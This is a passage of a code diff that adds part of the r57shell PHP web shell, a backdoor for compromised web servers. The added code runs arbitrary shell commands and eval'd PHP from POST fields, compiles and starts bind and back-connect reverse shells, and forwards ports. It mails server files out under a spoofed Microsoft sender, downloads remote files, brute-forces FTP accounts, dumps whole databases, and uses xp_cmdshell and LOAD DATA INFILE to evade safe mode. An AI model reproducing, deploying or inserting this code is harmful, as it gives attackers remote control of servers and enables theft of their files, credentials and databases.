+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+$uname = ex('uname -a');
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+if(!$safe_mode){
+$bsd1 = ex('sysctl -n kern.ostype');
+$bsd2 = ex('sysctl -n kern.osrelease');
+$lin1 = ex('sysctl -n kernel.ostype');
+$lin2 = ex('sysctl -n kernel.osrelease');
+}
+if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
+else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
+else { $sysctl = "-"; }
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+$id = ex('id');
+echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
+echo ws(3).$dir;
+echo ws(3).'( '.perms(@fileperms($dir)).' )';
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@get_current_user()."<br>";
+echo ws(3).$dir;
+echo "<br></font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(empty($c1)||empty($c2)) { die(); }
+$f = '<br>';
+$f .= base64_decode($c1);
+$f .= base64_decode($c2);
+if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail")
+ {
+ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n");	
+ mr($language,$res);
+ $_POST['cmd']="";  
+ }
+if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
+ {  
+ if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; }
+ else 
+  {	
+    $filename = @basename($_POST['loc_file']);
+    $filedump = @fread($file,@filesize($_POST['loc_file']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    $attach = array(
+                    "name"=>$filename,
+                    "type"=>$mime_type,
+                    "content"=>$filedump
+                   );
+    if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
+    if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
+    $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
+    mr($language,$res);
+    $_POST['cmd']="";                   	
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
+ else {
+ @fwrite($file,$_POST['e_text']);
+ @fclose($file);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);	
+ if(!$connection) { fe($language,0); }
+ else 
+  {   	
+  if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); }
+  else 
+   {	
+   if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);	}
+   if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);	}
+   }
+  }
+ @ftp_close($connection);
+ $_POST['cmd'] = "";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);	
+ if(!$connection) { fe($language,0); $_POST['cmd'] = ""; }	
+ else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
+ @ftp_close($connection);
+ }
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if($windows){ 
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{ 
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+ case 'safe_file':
+  if(@is_file($_POST['file']))
+   {
+   $file = @file($_POST['file']);
+   if($file)
+    {
+    $c = @sizeof($file);
+    for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
+    }
+   else echo $lang[$language._text29];
+   }
+  else echo $lang[$language._text31];
+  break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
+     @mysql_query($sql);
+     $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "SELECT * FROM temp_r57_table;";
+     $r = @mysql_query($sql);
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table r57_temp_table",$db);
+     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from r57_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }	
+    @mssql_query("drop table r57_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
+ $cmd_rep = ex($_POST['cmd']);
+ if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="ftp_brute")
+ {
+ $suc = 0;
+ foreach($users as $user)
+  {	
+  $connection = @ftp_connect($ftp_server,$ftp_port,10);	
+  if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
+  else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } 
+  @ftp_close($connection);
+  }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse'])) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="db_show")
+ {
+ switch($_POST['db'])
+ {
+ case 'MySQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+ $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mysql_query("SHOW DATABASES", $db);
+   while(($row=@mysql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db);
+     while(($row2=@mysql_fetch_row($res2))) 
+      {
+      echo " | - ".$row2[0]."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db);
+       while(($row3=@mysql_fetch_row($res3))) { echo "   | - ".$row3[0]."\r\n"; }
+       }
+      }	
+     }
+    }
+   @mysql_close($db);
+   }
+ else echo "[-] ERROR! Can't connect to MySQL server";  	
+ break;
+ case 'MSSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+ $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mssql_query("sp_databases", $db);
+   while(($row=@mssql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     @mssql_select_db($row[0]);
+     $res2 = @mssql_query("sp_tables",$db);
+     while(($row2=@mssql_fetch_array($res2))) 
+      {
+      if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties')
+      {
+      echo " | - ".$row2['TABLE_NAME']."\r\n"; 
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mssql_query("sp_columns ".$row2[2],$db);
+       while(($row3=@mssql_fetch_array($res3))) { echo "   | - ".$row3['COLUMN_NAME']."\r\n"; }
+       }
+      }
+      }	
+     }
+    }
+   @mssql_close($db);
+   }
+ else echo "[-] ERROR! Can't connect to MSSQL server";
+ break;
+ case 'PostgreSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+  $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'");
+   while(($row=@pg_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+    }	
+  @pg_close($db);
+  }
+ else echo "[-] ERROR! Can't connect to PostgreSQL server"; 	
+ break;
+ }
+ }
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $sqh  = "# homepage: http://rst.void.ru\r\n";
+  $sqh .= "# ---------------------------------\r\n";
+  $sqh .= "#     date : ".date ("j F Y g:i")."\r\n";
+  $sqh .= "# database : ".$_POST['mysql_db']."\r\n";
+  $sqh .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+  $sqh .= "# ---------------------------------\r\n\r\n";
+  switch($_POST['db']){
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MySQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+     $sql2 = '';
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+     if (@mysql_num_rows($res) > 0) {
+     while (($row = @mysql_fetch_assoc($res))) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MySQL server";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+  {
+   if(@mssql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MSSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db);
+     if (@mssql_num_rows($res) > 0) {
+     while (($row = @mssql_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+    }
+   else echo "[-] ERROR! Can't select database";
+   @mssql_close($db); 	
+  }	
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+     $sql1  = "# PostgreSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl']."");
+     if (@pg_num_rows($res) > 0) {
+     while (($row = @pg_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+   @pg_close($db); 	
+  }	
+  else echo "[-] ERROR! Can't connect to PostgreSQL server";
+  break;
+  } 
+ } 
+ else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; }
+ } 
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+function up_down($id)
+ {
+ global $lang;
+ global $language;
+ return '&nbsp<img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getElementById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" title="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 onClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">';	
+ }
+function div($id)
+ { 
+ if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">'; 	
+ return '<div id="'.$id.'">';
+ }
+if(!$safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.'</div>'.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode){
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+if(!$safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
